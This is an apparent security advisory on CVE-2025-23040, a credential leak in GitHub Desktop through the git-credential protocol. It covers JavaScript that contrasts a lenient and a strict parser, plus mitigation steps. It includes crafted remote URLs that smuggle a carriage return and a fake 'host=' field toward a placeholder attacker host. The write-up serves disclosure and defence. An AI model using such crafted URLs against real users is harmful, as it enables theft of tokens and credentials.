Introduction

GitHub Desktop, GitHub's open-source Electron-based desktop client, was found to contain a vulnerability (CVE-2025-23040) that lets an attacker obtain the user's stored credentials through a flaw in how the application handles requests made over the git-credential protocol. The issue is particularly dangerous because a maliciously crafted remote URL is enough to exfiltrate credentials, with no prompt or other indication shown to the user.

Exploit Details

Exploitation requires the targeted user to clone a repository the attacker controls, either directly or as a submodule of some other repository the user cloned. GitHub Desktop delegates all network operations (clone, fetch, push) to Git: when the user clones, GitHub Desktop runs git clone, and when Git reaches a remote that requires authentication it asks GitHub Desktop, acting as Git's credential helper, for the credentials of that host using the git-credential protocol. That protocol is a short list of key=value lines (protocol=, host=, and optionally username=), each terminated by a newline and followed by a blank line; the helper answers in the same format, and for github.com GitHub Desktop answers with the user's username and OAuth token.

A maliciously crafted URL lets the attacker corrupt the credential request that Git builds from it. GitHub Desktop parses the corrupted request incorrectly and, as a result, hands back the user's GitHub username and OAuth token, or credentials it stores for other Git remote hosts, which Git then sends to a host under the attacker's control.

Consider this example of a maliciously crafted URL (the hosts are placeholders):

https://attacker.example.com%0Dhttp.example.org/repo.git

Git percent-decodes the URL when it builds the credential request, so the %0D arrives in GitHub Desktop as a raw carriage return inside a field value. A literal newline (%0A) would not get this far: Git has refused to write a credential value containing a newline since the fix for CVE-2020-5260, but before Git 2.48.1 it did not check for a carriage return. A helper that treats a carriage return as a line terminator reads whatever follows it as a further line of the request, so the fields GitHub Desktop ends up with no longer describe the host Git is actually connected to. GitHub Desktop then returns credentials that Git sends to attacker.example.com rather than to the host the user intended.
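As an added example (not GitHub Desktop's own code, and not the exact request that defeated the vulnerable versions), the following JavaScript models the credential request Git builds from a remote URL, a lenient parser that treats a carriage return as a line break and is fooled by a smuggled field, and a hardened parser that rejects control characters. It goes beyond the URL above in one respect: the smuggled field is placed in the userinfo part of the URL, which is the general form of this smuggling, since any percent-decoded part of the URL that lands in a request value can carry it. The credential store, host names and the crafted URL are constructed for illustration.

```javascript
// Added example, not GitHub Desktop's code: a model of the git-credential
// "get" request Git builds from a remote URL, and two helper-side parsers.
// parseLenient treats CR as a line break and is fooled by a smuggled field;
// parseStrict rejects control characters. Store, hosts and URL are constructed.

// Hypothetical in-memory credential store standing in for what the app holds.
const STORE = {
  'github.com': { username: 'octocat', password: 'gho_exampletoken' },
};

// Model of how Git turns a URL into a credential request: key=value lines,
// each terminated by LF, followed by a blank line. Git percent-decodes the
// userinfo, so a %0D there becomes a raw CR inside the value. (Git only adds
// path= when credential.useHttpPath is set, so it is omitted here.)
function requestFromUrl(urlString) {
  const u = new URL(urlString);
  const lines = [`protocol=${u.protocol.replace(/:$/, '')}`, `host=${u.host}`];
  if (u.username !== '') lines.push(`username=${decodeURIComponent(u.username)}`);
  return lines.join('\n') + '\n\n';
}

// Lenient parser: CRLF, CR or LF all end a line, and a later key overwrites an
// earlier one. A CR smuggled into one value therefore yields an extra line.
function parseLenient(request) {
  const fields = {};
  for (const line of request.split(/\r\n|\r|\n/)) {
    if (line === '') break;                  // blank line ends the request
    const eq = line.indexOf('=');
    if (eq < 0) continue;
    fields[line.slice(0, eq)] = line.slice(eq + 1);
  }
  return fields;
}

// Hardened parser: only LF ends a line, and a CR, LF or NUL anywhere in a key
// or value aborts the whole request instead of being reinterpreted.
function parseStrict(request) {
  const fields = {};
  for (const line of request.split('\n')) {
    if (line === '') break;
    const eq = line.indexOf('=');
    if (eq < 0) throw new Error(`malformed credential line ${JSON.stringify(line)}`);
    const key = line.slice(0, eq);
    const value = line.slice(eq + 1);
    if (/[\r\n\0]/.test(key) || /[\r\n\0]/.test(value)) {
      throw new Error(`control character in credential field ${JSON.stringify(key)}`);
    }
    fields[key] = value;
  }
  return fields;
}

// What a helper built on the given parser would hand back to Git for this
// request: the stored entry for the host the parser reports, or null.
function answer(parse, request) {
  const fields = parse(request);
  return STORE[fields.host] || null;
}

// Constructed attacker URL: the userinfo carries %0D followed by host=github.com,
// while Git's actual connection (and the leaked answer) goes to attacker.example.com.
const CRAFTED_URL = 'https://git%0Dhost=github.com@attacker.example.com/repo.git';

if (typeof require !== 'undefined' && require.main === module) {
  const req = requestFromUrl(CRAFTED_URL);
  console.log(JSON.stringify(req));
  console.log('lenient ->', answer(parseLenient, req)); // returns the github.com entry
  try {
    answer(parseStrict, req);
  } catch (e) {
    console.log('strict  ->', e.message);               // request rejected
  }
}
```

Run with node: the lenient parser reports host=github.com for a request Git generated for attacker.example.com and would hand the GitHub token to the wrong server, while the strict parser refuses the request outright. The strict parser deliberately fails closed on any control character rather than trying to strip it, because a stripped value would still be a value Git never sent.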

Mitigation

GitHub Desktop 3.4.12 contains the fix for this vulnerability, and users should update to it immediately. Note that GitHub Desktop ships with its own embedded copy of Git, so updating a separately installed system Git does not protect the application. Anyone who has cloned an untrusted repository, or a repository with untrusted submodules, using an earlier version should assume their credentials may have been exposed: revoke GitHub Desktop's authorization in the GitHub account settings (Applications, Authorized OAuth Apps), sign in again to obtain a fresh token, and rotate any credentials stored in GitHub Desktop for other Git hosts.

Original References

- GitHub Desktop Security Advisory: GHSA-4444-4hhg-fg57
- GitHub Desktop Release Notes 3.4.12: Release v3.4.12

Conclusion

CVE-2025-23040 is a credential-leak vulnerability in GitHub Desktop. Through a crafted remote URL that corrupts the request Git makes over the git-credential protocol, an attacker can obtain the user's GitHub username and OAuth token, or credentials for other Git remote hosts stored in GitHub Desktop. Users should update to GitHub Desktop 3.4.12 or later and revoke and rotate any relevant credentials if they may have cloned an untrusted repository with an earlier version.

Timeline

Published on: 01/15/2025 18:15:24 UTC